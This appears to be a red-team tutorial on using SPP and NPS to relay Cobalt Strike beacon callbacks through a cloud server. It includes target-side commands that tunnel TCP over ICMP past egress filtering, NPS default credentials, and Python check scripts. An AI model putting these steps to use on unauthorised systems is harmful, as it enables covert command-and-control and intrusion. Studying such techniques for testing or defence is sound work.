
Intranet Infiltration—Tunnel construction & SPP and NPS intranet penetration

Author: Annoying stars

1. Preamble

  The previous article covered the basics of tunnel construction and proxy forwarding in detail, so they are not repeated here; this article goes straight to demonstrating the remaining two tools, SPP and NPS.

2. SPP

  SPP's full usage is documented on its GitHub page in considerable detail; only a brief demonstration is given here.

  Supported transport protocols: TCP, UDP, RUDP (reliable UDP), RICMP (reliable ICMP), RHTTP (reliable HTTP), KCP, QUIC

  Supported modes: forward proxy, reverse proxy, SOCKS5 forward proxy, SOCKS5 reverse proxy

  SPP Download: https://gitcode.com/esrrhs/spp?utm_source=csdn_github_accelerator&isLogin=1

2.1. SPP Proxy Communications

  The proxy communication here works on the same principle as in the previous article: a reverse proxy. The attack machine has no public IP, so a generated Trojan (payload) has nowhere to connect back to. A cloud server solves this: the cloud server runs the SPP server, the attack machine runs the SPP client and connects out to the server on a chosen port, and an SPP reverse proxy maps a port on the server to a local port on the attack machine. When the Trojan connects to that server port it is in effect connecting to the attack machine's local port, so the attack machine only needs a listener on the local port to receive the beacon.


2.1.1. Server Configuration

  A cloud server (ECS) must be prepared in advance. Upload the spp binary and make it executable; the client connection port (8888 below) and the payload callback port (7777 below) must also be reachable through the server's security group or firewall.

chmod +x spp ## add execute permission
./spp -type server -proto tcp -listen :8888 ## start spp as the server: transport protocol tcp, listening on local port 8888

2.1.2. Client Configuration

  The client runs on the attack machine. The mapping is: when anything connects to port 7777 on the server, the server hands the connection to this client, which forwards it to local port 5555. Connecting to server:7777 is therefore equivalent to connecting to the attack machine's local port 5555.

chmod +x spp ## add execute permission
./spp -name "test" -type reverse_proxy_client -server <server IP>:8888 -fromaddr :7777 -toaddr :5555 -proxyproto tcp ## give the client a name, connect to the server's IP and port, map server port 7777 to local port 5555, proxied protocol tcp

2.1.3. CS settings

  Cobalt Strike needs two listeners here: one whose address is used when generating the Trojan (the callback address the payload connects to), and one that actually receives the beacon on the attack machine.

2.1.3.1. Listener used to generate the payload

  This listener's host is the server's public IP and its port is 7777. After the Trojan executes it connects to server port 7777, which the configuration above forwards to local port 5555 on the attack machine.


2.1.3.2. Listener that receives the beacon

  This one only needs to bind the attack machine's local IP on port 5555.


2.1.4. Execution Effect

  The beacon comes online successfully.
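  Before burning a payload on a mapping like server:7777 -> local:5555, it is worth proving the path works end to end. The script below is an added example written for this article; it is neither the article's nor the spp project's code. start_relay() is a minimal stand-in for what the SPP server does with -fromaddr and -toaddr (accept on one port, relay to another), so that the check can be demonstrated offline on one machine; verify_mapping() is the part you would actually run on the attack machine against the real server IP and ports, with the SPP client already connected and before the Cobalt Strike listener takes port 5555. The ports 17777 and 15555 used in the self-test are arbitrary assumptions.

```python
import os
import socket
import threading


def _pipe(src, dst):
    """Copy bytes from src to dst until EOF, then tear down both sockets."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            s.close()


def start_relay(listen_port, target_port, host="127.0.0.1"):
    """Model of the server side of a reverse-proxy mapping (-fromaddr -> -toaddr):
    accept TCP connections on host:listen_port and relay each one to host:target_port.
    This only imitates the port mapping; it is not spp. Returns the listening socket;
    close() it to stop the relay."""
    lsock = socket.socket()
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((host, listen_port))
    lsock.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = lsock.accept()
            except OSError:          # listener closed, relay stops
                return
            try:
                upstream = socket.create_connection((host, target_port), timeout=5)
            except OSError:          # nothing listening on the target port yet
                client.close()
                continue
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock


def verify_mapping(entry_host, entry_port, local_port, timeout=5.0):
    """Check that a TCP connection to entry_host:entry_port arrives on 127.0.0.1:local_port.
    Binds local_port as a stand-in for the C2 listener, pushes a random nonce into the
    tunnel entry and reports whether that nonce came out on the local port."""
    nonce = os.urandom(16)
    received = []
    lsock = socket.socket()
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind(("127.0.0.1", local_port))
    lsock.listen(1)
    lsock.settimeout(timeout)

    def accept_once():
        try:
            conn, _ = lsock.accept()
        except OSError:              # nothing came through before the timeout
            return
        with conn:
            conn.settimeout(timeout)
            buf = b""
            try:
                while len(buf) < len(nonce):
                    chunk = conn.recv(len(nonce) - len(buf))
                    if not chunk:
                        break
                    buf += chunk
            except OSError:
                pass
            received.append(buf)

    worker = threading.Thread(target=accept_once)
    worker.start()
    try:
        with socket.create_connection((entry_host, entry_port), timeout=timeout) as s:
            s.sendall(nonce)
    except OSError:
        pass                         # entry port unreachable; the accept side will time out
    worker.join(timeout + 1)
    lsock.close()
    return received == [nonce]


def selftest(entry_port=17777, local_port=15555):
    """Offline demonstration: a local relay plays the server, so the check must pass."""
    relay = start_relay(entry_port, local_port)
    try:
        return verify_mapping("127.0.0.1", entry_port, local_port, timeout=3.0)
    finally:
        relay.close()


if __name__ == "__main__":
    print("mapping verified:", selftest())
```

  Against the real setup the call is verify_mapping("<server IP>", 7777, 5555); a False result with the SPP client still connected usually means the server's port 7777 is filtered by the security group, or the client was started with a -toaddr that does not match the port you are checking.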


2.2. SPP tunnel establishment

  The scenario here is that the target host's outbound TCP is blocked but ICMP still gets through. SPP on the target wraps the TCP traffic in ICMP (its ricmp transport) and sends it to the server, which unwraps it. Note that sending and receiving raw ICMP needs root (or CAP_NET_RAW on Linux) on both the target and the server.


2.2.1. Server Settings

  The server listener here uses the ICMP transport:

./spp -type server -proto ricmp -listen 0.0.0.0 ## listen for ICMP on all interfaces; ICMP has no port numbers, so only an address is given

2.2.2. Client Configuration

  The client configuration is done on the target host. It forwards a local TCP port: whatever connects to the local -fromaddr port has its TCP stream wrapped in ICMP, carried to the server, and delivered by the server to its -toaddr port.

./spp -name "test" -type proxy_client -server <server IP> -fromaddr :5555 -toaddr :6666 -proxyproto tcp -proto ricmp ## on the target: local port 5555 is tunnelled over ICMP to the server and comes out at the server's port 6666

2.2.3. CS settings

  Cobalt Strike again needs two listeners: one used when generating the Trojan, and one that receives the beacon.

2.2.3.1. Listener used to generate the payload

  The payload listener points at 127.0.0.1 port 5555, because that is the local port the SPP client on the target is listening on; the Trojan connects to it and its traffic leaves the host as ICMP.


2.2.3.2. Listener that receives the beacon

  This one only needs to bind port 6666 on the local IP of the host where the tunnel exits, i.e. the SPP server, since that is where -toaddr :6666 delivers the traffic.


2.2.4. Execution Effect

  The beacon comes online here as well.
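  What "disguising TCP as ICMP" means on the wire, and the two preconditions to confirm before trusting such a tunnel, as an added example written for this article (not code from the article or from spp; spp's own ricmp framing is not reproduced here). build_echo_request() emits a standard ICMP echo request whose data field carries an arbitrary payload, which is exactly where an ICMP tunnel stuffs its TCP stream bytes; parse_icmp() checks the RFC 1071 checksum the receiving kernel and server will verify; can_open_raw_icmp() tells you whether the current process is even allowed to send raw ICMP; probe() sends one such packet to the server and waits for the matching echo reply. The payload string and the use of the process id as identifier are assumptions chosen for the demo.

```python
import os
import socket
import struct
import time


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit big-endian words,
    an odd trailing byte padded with zero, end-around carry folded, result complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 (echo request), code 0, identifier and sequence as ping uses them;
    the data field after the 8-byte header carries `payload`."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident & 0xFFFF, seq & 0xFFFF)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident & 0xFFFF, seq & 0xFFFF) + payload


def parse_icmp(pkt: bytes):
    """Return (type, code, ident, seq, payload). Raises ValueError on a short packet or a
    bad checksum: the sum over a valid packet, checksum field included, folds to zero."""
    if len(pkt) < 8:
        raise ValueError("short ICMP packet")
    if icmp_checksum(pkt) != 0:
        raise ValueError("bad ICMP checksum")
    typ, code, _, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return typ, code, ident, seq, pkt[8:]


def can_open_raw_icmp() -> bool:
    """Raw ICMP sockets need root or CAP_NET_RAW on Linux; without that privilege
    neither end of an ICMP tunnel can run."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except OSError:
        return False
    s.close()
    return True


def probe(server_ip: str, payload: bytes = b"tunnel-probe", timeout: float = 2.0) -> bool:
    """Send one echo request carrying `payload` and wait for an echo reply (type 0) with the
    same identifier, sequence and payload. True means echo requests with arbitrary data reach
    the server and replies come back, the minimum an ICMP tunnel needs. Needs raw-socket
    privilege; the identifier is the low 16 bits of the pid, as ping does it (assumption)."""
    ident, seq = os.getpid() & 0xFFFF, 1
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        s.settimeout(timeout)
        s.sendto(build_echo_request(ident, seq, payload), (server_ip, 0))
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            try:
                data, _ = s.recvfrom(65535)
            except socket.timeout:
                return False
            ihl = (data[0] & 0x0F) * 4       # raw IPv4 sockets hand back the IP header too
            try:
                typ, _, rid, rseq, rpayload = parse_icmp(data[ihl:])
            except ValueError:
                continue                      # not for us or corrupted; keep waiting
            if typ == 0 and (rid, rseq, rpayload) == (ident, seq, payload):
                return True
    return False


if __name__ == "__main__":
    print("raw ICMP allowed:", can_open_raw_icmp())
    print(build_echo_request(1, 1, b"tunnel-probe").hex())
```

  If can_open_raw_icmp() is False on the target, the ricmp client will not work there either, whatever the firewall allows. From the defender's side the same packet structure is the tell: echo requests whose data length or content departs from the fixed pattern a normal ping sends, or that arrive at a rate no human ping produces, are what a sensor should flag.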


3. NPS

  NPS is a lightweight, high-performance and feature-rich intranet penetration proxy server. It currently supports TCP and UDP traffic forwarding, and therefore any protocol layered on TCP or UDP (access to intranet websites, local payment-interface debugging, SSH, remote desktop, intranet DNS resolution, and so on). It also provides an intranet HTTP proxy, an intranet SOCKS5 proxy, P2P and more, and has a full-featured web management console.

  NPS Download: https://gitcode.com/ehang-io/nps?utm_source=csdn_github_accelerator&isLogin=1

3.1. NPS Principle

  NPS works on the same principle as SPP above, so it is not described again here.

3.2. NPS Installation

  The NPS server (nps) and client (npc) are different binaries, so take care to download the right one for each side. The configuration file involves a number of ports and settings; the defaults work without modification and are best used as-is for a first run, consulting the official documentation if changes are needed. The one exception is the credentials: the default web login and client key listed below are public knowledge, so change them before the server is left reachable from the internet, and restrict the web management port to your own address.

  Official Documentation: https://github.com/ehang-io/nps/blob/master/README_zh.md

The default nps configuration file uses ports 80, 443, 8080 and 8024:
80 and 443 are the default ports for domain-name (host) resolution mode
8080 is the web management port
8024 is the bridge port, used for client-server communication
Default account/password: admin/123

3.2.1. Server Configuration

  Download the server package, unzip it, and install it:

./nps install ## register nps as a system service
nps start ## start nps
nps stop ## stop nps
nps restart ## restart nps

3.2.1.1. Access the server

  Browse to http://<ECS public IP>:8080 and log in with the default account admin / 123 (change it before leaving the server exposed).


3.2.1.2. Establish a tunnel

  The tunnel created here is a TCP tunnel. The client ID is the ID of the NPS client (from the Client page) that this tunnel belongs to, i.e. the npc that will connect with that client's vkey. The service port is the port other users connect to on the server; the destination (target) port is the port on the client that the server port is forwarded to. In short: server:<service port> is forwarded to client:<target port>.


3.2.1.3. Tunnel State

  The tunnel shows as offline for now, because no client has connected yet.


3.2.2. Client Configuration

  Likewise, take care to download the client package (npc) and not the server; the client only needs to be unpacked.

3.2.2.1. Modify the configuration file

  The conf folder contains npc.conf. Only one thing needs changing there: the server address and port, i.e. the address the client uses to reach the server. The rest can stay at the defaults (change them according to the official documentation if you need to).

  Editing the file is not strictly necessary here, because the start command below passes the server IP, port and key on the command line anyway.

server_addr=124.XXX.XXX.62:8024 ## server address:port; the bridge port defaults to 8024
vkey=123 ## client verification key

3.2.2.2. Start the client

  Start the client with the command below (note that this is the Linux client):

./npc -server=124.XX.XX.62:8024 -vkey=123 -type=tcp ## server IP and bridge port, the client's verification key, and the bridge protocol type

3.2.2.3. Tunnel Status

  The tunnel status page now shows the tunnel online.


3.3. CS settings

  As before, Cobalt Strike needs two listeners: one used when generating the Trojan, and one that receives the beacon.

3.3.1. Listener used to generate the payload

  This listener's host is the server's IP and its port is 5656. After the Trojan executes it connects to server port 5656, which the tunnel created above forwards to the client's local port 6666.


3.3.2. Listener that receives the beacon

  This one only needs to bind the attack machine's local IP on port 6666.


3.4. Execution Effects

  The beacon comes online successfully.


3.5. Summary

  NPS has many more usage modes than the one shown here; refer to the official manual for the rest.
